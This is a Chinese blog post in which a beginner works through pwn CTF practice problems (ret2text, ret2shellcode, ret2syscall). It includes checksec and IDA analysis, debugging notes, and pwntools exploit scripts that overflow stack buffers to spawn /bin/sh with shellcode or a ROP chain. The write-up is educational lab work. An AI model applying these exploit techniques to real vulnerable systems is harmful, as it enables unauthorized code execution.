<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="从0开始的Pwn生活与其说是题解，不如说是萌新初次见面的哦哈呦 Ret2text没得说，复习的时候再写">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwn题解">
<meta property="og:url" content="http://example.com/2024/11/24/Pwn%E9%A2%98%E8%A7%A3/index.html">
<meta property="og:site_name" content="Pocon&#39;s Blog">
<meta property="og:description" content="从0开始的Pwn生活与其说是题解，不如说是萌新初次见面的哦哈呦 Ret2text没得说，复习的时候再写">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124203338698.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124203655566.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124204040843.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124213147737.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124213831067.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124214947632.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124215221005.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124223816018.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241125105258338.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241126203800780.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241126200304228.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241126205924180.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128143917697.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128144009902.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128144400349.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128144455036.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128150557112.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128152855316.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241129101348955.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241129101419976.png">
<meta property="article:published_time" content="2024-11-24T12:27:38.000Z">
<meta property="article:modified_time" content="2025-03-30T03:40:20.098Z">
<meta property="article:author" content="Pocon">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124203338698.png">

<link rel="canonical" href="http://example.com/2024/11/24/Pwn%E9%A2%98%E8%A7%A3/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Pwn题解 | Pocon's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Pocon's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/11/24/Pwn%E9%A2%98%E8%A7%A3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Pocon">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pocon's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Pwn题解
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-11-24 20:27:38" itemprop="dateCreated datePublished" datetime="2024-11-24T20:27:38+08:00">2024-11-24</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-03-30 11:40:20" itemprop="dateModified" datetime="2025-03-30T11:40:20+08:00">2025-03-30</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">网络安全</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="从0开始的Pwn生活"><a href="#从0开始的Pwn生活" class="headerlink" title="从0开始的Pwn生活"></a>从0开始的Pwn生活</h1><p>与其说是题解，不如说是萌新初次见面的哦哈呦</p>
<h1 id="Ret2text"><a href="#Ret2text" class="headerlink" title="Ret2text"></a>Ret2text</h1><p>没得说，复习的时候再写</p>
<p>更权威的查找后门函数方法：</p>
<ol>
<li>ctrl + F搜索 system</li>
<li>shift + F12看有没有字符串 &#x2F;bin&#x2F;sh</li>
</ol>
<h1 id="Ret2ShellCode"><a href="#Ret2ShellCode" class="headerlink" title="Ret2ShellCode"></a>Ret2ShellCode</h1><h4 id="第一次的思路"><a href="#第一次的思路" class="headerlink" title="第一次的思路"></a>第一次的思路</h4><h5 id="查看保护"><a href="#查看保护" class="headerlink" title="查看保护"></a>查看保护</h5><p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124203338698.png" alt="image-20241124203338698">	</p>
<p>保护 &#x3D;  ZERO</p>
<p>32位</p>
<h5 id="IDA下静态调试"><a href="#IDA下静态调试" class="headerlink" title="IDA下静态调试"></a>IDA下静态调试</h5><p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124203655566.png" alt="image-20241124203655566"> </p>
<p>setvbuf是清空缓冲区。简单来说就是说不要设置输入输出缓冲区，不然没满发不出去。</p>
<p>这个gets很关键，基本判别是溢出解法。</p>
<p>执行内容位把s的值赋给buf2</p>
<p>让我们查看下buf2的位置</p>
<p>​                                                                                                                                                                                                                                                                                                                                                                                             </p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124204040843.png" alt="image-20241124204040843">                                                                                                                                                                           </p>
<p>bss区域是可执行的，只需要在这里覆盖上我们需要执行的代码就好了</p>
<p>返回地址覆盖位这个bss的地址</p>
<img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124213147737.png" alt="image-20241124213147737" style="zoom: 33%;">	

<p>所以我猜测应该是覆盖strcpy的返回地址到buf2数组的地址，数组内容应该是&#x2F;bin&#x2F;sh对应的机器码</p>
<p>payload &#x3D; 0x64+4的无效数据加上&#x2F;bin&#x2F;sh的机器码</p>
<h4 id="正确思路"><a href="#正确思路" class="headerlink" title="正确思路"></a>正确思路</h4><p>s是一个局部变量，gets可以将任意长度的字符赋值给s。当输入过长时，一直向高地址溢出可能覆盖main函数的返回地址。所以溢出的栈帧应该是main函数的栈帧</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124213831067.png" alt="image-20241124213831067"> </p>
<p>这里看到，距离ebp刚好是100字节。</p>
<p>ebp指向的是栈底，紧随其后的就是previous ebp，再往后面就是return address了</p>
<p>不过静态调试分析不一定正确，题目可能有灵活性。此时需要动态调试。动态才是真正的实践出真知。</p>
<h5 id="动态调试"><a href="#动态调试" class="headerlink" title="动态调试"></a>动态调试</h5><p>gets输入后直接看栈内容</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124214947632.png" alt="image-20241124214947632"> </p>
<p>首先第一行，esp。它的意思是，这里存的是一个指针，AAAA是这个指针存的内容</p>
<p>AAAA实际的位置在cddc处</p>
<p>向上查看寄存器ebp的值              </p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124215221005.png" alt="image-20241124215221005"> </p>
<p>从eax到ebp就是应该填充的数组的值，然后再用4字节垃圾数据填充掉previous ebp，最后覆盖返回地址即可</p>
<p><strong>结果地址差是108，并非100</strong>。这是为什么？</p>
<h5 id="写攻击脚本"><a href="#写攻击脚本" class="headerlink" title="写攻击脚本"></a>写攻击脚本</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = process(<span class="string">&#x27;./ret2shellcode&#x27;</span>)</span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">payload = shellcode.ljust(<span class="number">112</span>,<span class="string">b&#x27;A&#x27;</span>)+p32(<span class="number">0x0804A080</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>ljust(int n,char c) 前方字节流不变，后方补充数据C直到到达n个字节</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241124223816018.png" alt="image-20241124223816018"> </p>
<p>这不对啊 :question:</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241125105258338.png" alt="image-20241125105258338"> </p>
<p>仔细一看，bss段竟然没有可执行权限。这和说好的不一样啊</p>
<p>破案了，LInux内核问题，不用纠结这题就是这样做的。</p>
<p>当然也可以用mprotect函数或者换到Ubuntu 18以下的版本</p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p>动态调试和静态分析的结果可能有区别，一切按照动态调试的来。所以找长度的时候出了错</p>
<p>另外需要通过pwntools来生成shellcode的机器码</p>
<h1 id="NewStarCTF-公开赛赛道-ret2shellcode"><a href="#NewStarCTF-公开赛赛道-ret2shellcode" class="headerlink" title="[NewStarCTF 公开赛赛道] ret2shellcode"></a>[NewStarCTF 公开赛赛道] ret2shellcode</h1><h4 id="第一次的思路-1"><a href="#第一次的思路-1" class="headerlink" title="第一次的思路"></a>第一次的思路</h4><h5 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h5><p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241126203800780.png" alt="image-20241126203800780">	</p>
<p>没有Canary保护的话，将返回地址覆盖是可行的。应该还是传统栈溢出。</p>
<p>注意是64位</p>
<h5 id="静态分析"><a href="#静态分析" class="headerlink" title="静态分析"></a>静态分析</h5><p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241126200304228.png" alt="image-20241126200304228"> </p>
<p>关键有三步，第一步有一个mmap函数（这是啥我不知道），第二步向buf数组<strong>标准输入</strong>0x100字节的数据，第三步向v4数组标准输入0x100字节的数据。ULL后缀目的是确保编译器正确解析该数字的类型。</p>
<p><strong>read和gets的区别在于：</strong></p>
<p><code>read</code>需要指定读取长度，可以避免缓冲区溢出；<code>gets</code>读取输入直到\n出现，会导致缓冲区溢出</p>
<p><code>read</code>需要手动处理读取的字节并在缓冲区末尾添加\0形成字符串；<code>gets</code>自动在字符串末尾田间空字符\0形成字符串</p>
<p>百度一下：<code>mmap</code> </p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/huxiao-tee/p/4660352.html">https://www.cnblogs.com/huxiao-tee/p/4660352.html</a></p>
<p>**内存映射：**简而言之就是将用户空间的一段内存区域映射到内核空间，映射成功后，用户对这段内存区域的修改可以直接反映到内核空间，同样，内核空间对这段区域的修改也直接反映用户空间。</p>
<p><code>mmap</code>是一种<strong>内存映射文件的方法</strong>，即将一个文件或者其它对象映射到进程的地址空间，实现文件磁盘地址和进程虚拟地址空间中一段虚拟地址的一一对映关系。</p>
<p><strong>函数原型</strong>：<code>void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);</code></p>
<p>start：映射区的开始地址</p>
<p>length：映射区的长度</p>
<p>prot：期望的内存保护标志</p>
<p>flags：指定映射对象的类型，映射选项和映射页是否可以共享</p>
<p>fd：有效的文件描述词</p>
<p>offset：被映射对象内容的起点</p>
<p>这个时候第一步就清楚了，即将buf映射到一个4096字节的内存，其起始地址为虚拟地址0x233000，且该内存空间<strong>可读可写可执行</strong>（省略了动态分析vmmap没发现有rwx段）</p>
<p>找到可读可写可执行，思路一下子就清晰了，将shellcode通过buf数组映射到这个虚拟空间，然后通过v4覆盖返回地址，覆盖的返回地址恰好为这个映射区的起始地址。<del>对还是不对？</del></p>
<p>那么第一次写入的数据就是shellcode &#x3D; asm(shellcraft.sh())</p>
<p>第二次写入的数据便为(0x30+8)的垃圾数据加上p64(0x233000)</p>
<p>发现一个小问题，这里会把 buf覆盖掉吗 （buf[]的首地址），覆盖了会有影响吗。</p>
<h5 id="写脚本"><a href="#写脚本" class="headerlink" title="写脚本"></a>写脚本</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">addr = <span class="number">0x233000</span></span><br><span class="line">payload = (<span class="number">0x30</span>+<span class="number">8</span>)*<span class="string">b&#x27;A&#x27;</span>+p64(<span class="number">0x233000</span>)</span><br><span class="line"></span><br><span class="line">io.recvline()</span><br><span class="line">io.sendline(shellcode)</span><br><span class="line"></span><br><span class="line">io.recvline()</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv()</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<h5 id="运行"><a href="#运行" class="headerlink" title="运行"></a>运行</h5><p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241126205924180.png" alt="image-20241126205924180">	</p>
<p>卧槽，你浩锅，直接过了</p>
<p>也是第一次没看提示解出来一道pwn题（抛开查了查mmap函数不谈）</p>
<h1 id="Ret2Syscall"><a href="#Ret2Syscall" class="headerlink" title="Ret2Syscall"></a>Ret2Syscall</h1><h4 id="哈吉咩得"><a href="#哈吉咩得" class="headerlink" title="哈吉咩得"></a>哈吉咩得</h4><h5 id="checksec-1"><a href="#checksec-1" class="headerlink" title="checksec"></a>checksec</h5><p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128143917697.png" alt="image-20241128143917697"> </p>
<p>32位，无保护，栈溢出</p>
<h5 id="静态分析-1"><a href="#静态分析-1" class="headerlink" title="静态分析"></a>静态分析</h5><p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128144009902.png" alt="image-20241128144009902"> </p>
<p>通过v4数组覆盖main函数的返回地址</p>
<p>其长度为0x64+4</p>
<p>而且这次没有后门函数也不能注入shellcode。考虑ROP，系统调用</p>
<h5 id="找到gadget地址"><a href="#找到gadget地址" class="headerlink" title="找到gadget地址"></a>找到gadget地址</h5><p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128144400349.png" alt="image-20241128144400349"> </p>
<p>首先想想&#x2F;bin&#x2F;sh得系统调用流程是什么</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128144455036.png" alt="image-20241128144455036"> </p>
<p>于是我们需要得分别有</p>
<p><code>pop eax；ret</code>	地址0x080bb196</p>
<p><code>pop ebx；ret</code>	地址0x0804838e</p>
<p>关于ecx和edx应该需要清空一下的吧。但是这里如果pop，ret感觉很麻烦。但找不到xor，ret就算了</p>
<p>所以</p>
<p> <code>xor ecx，ecx；ret</code>   或者 pop ret	地址</p>
<p><code>xor edx，edx；ret</code>  或者  pop ret</p>
<p><code>int 0x80</code></p>
<p>这些是我们需要的gadget。</p>
<p>但事实上发现只有xor eax，eax，所以ecx，edx应该是不需要怎么管的。</p>
<h5 id="构建payload"><a href="#构建payload" class="headerlink" title="构建payload"></a>构建payload</h5><p>pop的东东是栈顶元素，即esp指向的数。而v4数组在esp的上方。说明没办法通过v4来修改esp指向内容的值啊。</p>
<p>那该怎么办。</p>
<p>唐了，记住esp一直指向栈顶。</p>
<h4 id="正确思路-1"><a href="#正确思路-1" class="headerlink" title="正确思路"></a>正确思路</h4><h5 id="寻找后门函数"><a href="#寻找后门函数" class="headerlink" title="寻找后门函数"></a>寻找后门函数</h5><p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128150557112.png" alt="image-20241128150557112"> </p>
<p>尝试了两种方法（第一题），只找到了字符串（后门函数对应的参数），但没找到后门函数（system）。</p>
<h5 id="找gadget"><a href="#找gadget" class="headerlink" title="找gadget"></a>找gadget</h5><p><code>ROPgadget --binary ret2syscall --only &quot;pop|ret&quot; | grep eax</code>找到第一个gadget。其他以此类推</p>
<p>ecx和edx其实第一次构建payload的时候无需在意。因为一般情况下这个时候ecx和edx为0。可以先试试看，如果有问题再说。</p>
<p>这里找到两个gadget：</p>
<p>0x080bb196 : pop eax ; ret</p>
<p>0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</p>
<p>找不到的就替代。</p>
<p>最后 0x08049421 : int 0x80</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241128152855316.png" alt="image-20241128152855316"> </p>
<p>从下到上得看</p>
<h5 id="动态调试尝试覆盖原有返回地址"><a href="#动态调试尝试覆盖原有返回地址" class="headerlink" title="动态调试尝试覆盖原有返回地址"></a>动态调试尝试覆盖原有返回地址</h5><p> <img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241129101348955.png" alt="image-20241129101348955"></p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20241129101419976.png" alt="image-20241129101419976"> </p>
<p>这又是一道动态调试和静态分析结果不相同得一道题。结果需要注入（0x88-0x1c+4）的垃圾数据</p>
<h5 id="构建payload，编写exp"><a href="#构建payload，编写exp" class="headerlink" title="构建payload，编写exp"></a>构建payload，编写exp</h5><p><code>flat</code> 是 <code>pwntools</code> 提供的另一个函数，用于将传入的列表展平为一个连续的字节串。它会将列表中的元素（比如字节串、整数等）按顺序组合成一个连续的内存块。</p>
<p><code>payload = flat([b&#39;A&#39;*(112),pop_eax_addr, 0xb , pop_edx_ecx_ebx_addr, 0 , 0 , 0x80be408, int80_addr])</code></p>
<p>以下为exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>)</span><br><span class="line">io = process(<span class="string">&quot;./ret2syscall&quot;</span>)</span><br><span class="line"></span><br><span class="line">pop_eax_addr = <span class="number">0x080bb196</span></span><br><span class="line">pop_edx_ecx_ebx_addr = <span class="number">0x0806eb90</span></span><br><span class="line">int80_addr = <span class="number">0x08049421</span></span><br><span class="line">binsh = <span class="number">0x80be408</span></span><br><span class="line"></span><br><span class="line">payload = flat([<span class="string">&#x27;A&#x27;</span>*(<span class="number">112</span>), pop_eax_addr , <span class="number">0xb</span>,pop_edx_ecx_ebx_addr, <span class="number">0</span>,<span class="number">0</span>,binsh, int80_addr])</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv()</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<p>64位下遵循传参规则：</p>
<p>H(a, b, c, d, e, f, g, h);<br>a-&gt;%rdi, b-&gt;%rsi, c-&gt;%rdx, d-&gt;%rcx, e-&gt;%r8, f-&gt;%r9<br>h-&gt;8(%esp)<br>g-&gt;(%esp)<br>call H</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Pwn/" rel="tag"># Pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/11/16/Pwn%E5%AD%A6%E4%B9%A0/" rel="prev" title="Pwn学习">
      <i class="fa fa-chevron-left"></i> Pwn学习
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/12/08/node_modules/hexo-asset-img/README_zh/" rel="next" title="">
       <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%8E0%E5%BC%80%E5%A7%8B%E7%9A%84Pwn%E7%94%9F%E6%B4%BB"><span class="nav-number">1.</span> <span class="nav-text">从0开始的Pwn生活</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Ret2text"><span class="nav-number">2.</span> <span class="nav-text">Ret2text</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Ret2ShellCode"><span class="nav-number">3.</span> <span class="nav-text">Ret2ShellCode</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E6%AC%A1%E7%9A%84%E6%80%9D%E8%B7%AF"><span class="nav-number">3.0.0.1.</span> <span class="nav-text">第一次的思路</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8B%E4%BF%9D%E6%8A%A4"><span class="nav-number">3.0.0.1.1.</span> <span class="nav-text">查看保护</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#IDA%E4%B8%8B%E9%9D%99%E6%80%81%E8%B0%83%E8%AF%95"><span class="nav-number">3.0.0.1.2.</span> <span class="nav-text">IDA下静态调试</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AD%A3%E7%A1%AE%E6%80%9D%E8%B7%AF"><span class="nav-number">3.0.0.2.</span> <span class="nav-text">正确思路</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95"><span class="nav-number">3.0.0.2.1.</span> <span class="nav-text">动态调试</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%86%99%E6%94%BB%E5%87%BB%E8%84%9A%E6%9C%AC"><span class="nav-number">3.0.0.2.2.</span> <span class="nav-text">写攻击脚本</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">3.0.0.3.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-ret2shellcode"><span class="nav-number">4.</span> <span class="nav-text">[NewStarCTF 公开赛赛道] ret2shellcode</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E6%AC%A1%E7%9A%84%E6%80%9D%E8%B7%AF-1"><span class="nav-number">4.0.0.1.</span> <span class="nav-text">第一次的思路</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#checksec"><span class="nav-number">4.0.0.1.1.</span> <span class="nav-text">checksec</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90"><span 